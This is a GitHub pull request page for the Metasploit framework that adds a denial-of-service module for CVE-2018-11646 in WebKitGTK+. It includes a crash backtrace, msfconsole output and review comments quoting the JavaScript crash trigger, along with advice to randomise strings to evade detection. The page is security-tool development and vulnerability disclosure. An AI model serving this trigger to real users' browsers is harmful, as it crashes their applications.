Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

WebKit, as used in WebKitGTK+ Crash - CVE-2018-11646 #10156

Merged
merged 9 commits into from Jun 21, 2018
Merged

WebKit, as used in WebKitGTK+ Crash - CVE-2018-11646 #10156

merged 9 commits into from Jun 21, 2018

Conversation

RootUp
Copy link
Contributor

@RootUp RootUp commented Jun 9, 2018

Summary

This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.

Tested on : Epiphany Web Browser 3.28.x

Verification

msf auxiliary(dos/http/webkitplus) > show options 

Module options (auxiliary/dos/http/webkitplus):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.1.105    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /                no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer


msf auxiliary(dos/http/webkitplus) > run
[*] Auxiliary module running as background job 0.
msf auxiliary(dos/http/webkitplus) > 
[*] Using URL: http://192.168.1.105:8080/
[*] Server started.

msf auxiliary(dos/http/webkitplus) > 
[*] Sending response

msf auxiliary(dos/http/webkitplus) >

Backtrace using Fedora 27

#0 WTF::StringImpl::rawHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
#1 WTF::StringImpl::hasHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
#2 WTF::StringImpl::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
#3 WTF::StringHash::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
#9 WTF::HashMap, WTF::HashTraits >::get
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406
#10 webkitFaviconDatabaseSetIconURLForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193
#11 webkitFaviconDatabaseSetIconForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318
#12 webkitWebViewSetIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964
#13 WTF::Function::performCallbackWithReturnValue
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108
#15 WebKit::WebPageProxy::dataCallback
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083
#16 WebKit::WebPageProxy::finishedLoadingIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848
#17 IPC::callMemberFunctionImpl::operator()
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68
#29 WTF::RunLoop::::_FUN(gpointer)
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70
#30 g_main_dispatch
at gmain.c line 3148
#31 g_main_context_dispatch
at gmain.c line 3813
#32 g_main_context_iterate
at gmain.c line 3886
#33 g_main_context_iteration
at gmain.c line 3947
#34 g_application_run
at gapplication.c line 2401
#35 main
at ../src/ephy-main.c line 432

References:
https://bugs.webkit.org/show_bug.cgi?id=186164
https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html

bcoles
bcoles reviewed Jun 9, 2018
View reviewed changes
modules/auxiliary/dos/http/webkitplus.rb Outdated
def setup
@html = <<-JS
<script type="text/javascript">
win = window.open("sleep_one_second.php", "WIN");
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

What is sleep_one_second.php ?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

What i observed is that can be anything example hello_world.php or WIN

modules/auxiliary/dos/http/webkitplus.rb Outdated
@html = <<-JS
<script type="text/javascript">
win = window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can this be randomised? Does it need to be a real URL? If so, it should be configurable.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Alternatively, can the URL point back to the MSF HTTP server?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

URL is not necessary though, it can be configurable or simply we can change it to WIN

modules/auxiliary/dos/http/webkitplus.rb Outdated
win = window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
win.document.execCommand('Stop');
win.document.write("Spoofed URL");
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is this necessary? If so, is win.document.write(''); sufficient?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Not sure about this, but looks sufficient specifically to execute crash in WebkitGTK+

modules/auxiliary/dos/http/webkitplus.rb Outdated
super(
update_info(
info,
'Name' => "WebKitGTK+ leading to an application crash [DoS]",
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Perhaps: WebKitGTK+ WebKitFaviconDatabase DoS

modules/auxiliary/dos/http/webkitplus.rb Outdated
'Manuel Caballero' #JS Code
],
'References' => [
['EXPLOIT-DB', '44842'],
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

EDB

modules/auxiliary/dos/http/webkitplus.rb Outdated
['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],
['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']
],
'DisclosureDate' => 'June 03 2018',
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

'Jun 3 2018`

@RootUp
Some tweak
d3a18b2 
Thanks bcloes 😎
@RootUp RootUp mentioned this pull request Jun 9, 2018
Closed
@timwr
Copy link
Contributor

timwr commented Jun 10, 2018

Great stuff @RootUp
You might also be interested in: https://github.com/MTJailed/MSF-Webkit-10.3

@bcoles bcoles added docs and removed needs-docs labels Jun 10, 2018
@RootUp
Copy link
Contributor Author

RootUp commented Jun 10, 2018

Thanks @timwr
Never came across that repo, but will surely have a look.

bcoles
bcoles reviewed Jun 11, 2018
View reviewed changes
documentation/modules/auxiliary/dos/http/webkitplus.md Outdated
@@ -0,0 +1,96 @@
## Vulnerable Application

This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more. 

This module exploits a vulnerability in `WebKitFaviconDatabase` when `pageURL` is unset.
If successful, it could lead to application crash, resulting in denial of service.

The `webkitFaviconDatabaseSetIconForPageURL` and `webkitFaviconDatabaseSetIconURLForPageURL`
functions in `UIProcess/API/glib/WebKitFaviconDatabase.cpp` in WebKit, as used in WebKitGTK+
through 2.21.3, mishandle an unset `pageURL`, leading to an application crash.

documentation/modules/auxiliary/dos/http/webkitplus.md Outdated

This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful,it could leads to application crash, denial of service, webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash.

Related links :
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more. 

Related links : 
* https://bugs.webkit.org/show_bug.cgi?id=186164
* https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html

modules/auxiliary/dos/http/webkitplus.rb Outdated
'Name' => "WebKitGTK+ WebKitFaviconDatabase DoS",
'Description' => %q(
This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.
If successful,it could leads to application crash, denial of service.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If successful, it could lead to application crash, resulting in denial of service.

modules/auxiliary/dos/http/webkitplus.rb Outdated
win=window.open("sleep_one_second.php", "WIN");
window.open("https://www.paypal.com", "WIN");
win.document.execCommand('Stop');
win.document.write("Spoofed URL");
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hardcoded strings like Spoofed URL and sleep_one_second.php make the code easier to detect and prevent. They also increase the chances of the user realising something suspicious is afoot, in the event they're using a non-vulnerable browser that doesn't crash. These should be randomized where possible.

Similarly, PayPal probably aren't keen on being used as the default URL (free advertising?). The URL should point elsewhere if possible.

@RootUp
Copy link
Contributor Author

RootUp commented Jun 11, 2018

Thanks @bcoles 😎
I have made the necessary changes 👍

acammack-r7
acammack-r7 suggested changes Jun 13, 2018
View reviewed changes
Copy link
Contributor

@acammack-r7 acammack-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Minor changes

modules/auxiliary/dos/http/webkitplus.rb Outdated

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This also needs to

include Msf::Auxiliary::Dos

to avoid being unintentionally run by Pro and other tools.

@RootUp
Updated
c0a5a65 
Suggestion's by acammack-r7
@busterb busterb self-assigned this Jun 21, 2018
@busterb
Copy link
Member

busterb commented Jun 21, 2018

WFM, thanks @RootUp !

@busterb busterb merged commit c0a5a65 into rapid7:master Jun 21, 2018
busterb added a commit that referenced this pull request Jun 21, 2018
@busterb
Land #10156, WebKit, as used in WebKitGTK+ Crash - CVE-2018-11646
eaf043d
msjenkins-r7 pushed a commit that referenced this pull request Jun 21, 2018
@busterb @msjenkins-r7
Land #10156, WebKit, as used in WebKitGTK+ Crash - CVE-2018-11646
679378d
@busterb
Copy link
Member

busterb commented Jun 21, 2018

Release Notes

This adds an DoS module for CVE-2018-11646, exploiting a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it can cause a crash in applications using a vulnerable version of WebKitGTK+ up to version 2.21.3.

@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Jul 5, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bcoles bcoles bcoles left review comments

@acammack-r7 acammack-r7 acammack-r7 approved these changes

Assignees

@busterb busterb

Labels
docs module rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
6 participants
@RootUp @timwr @busterb @bcoles @acammack-r7 @tdoan-r7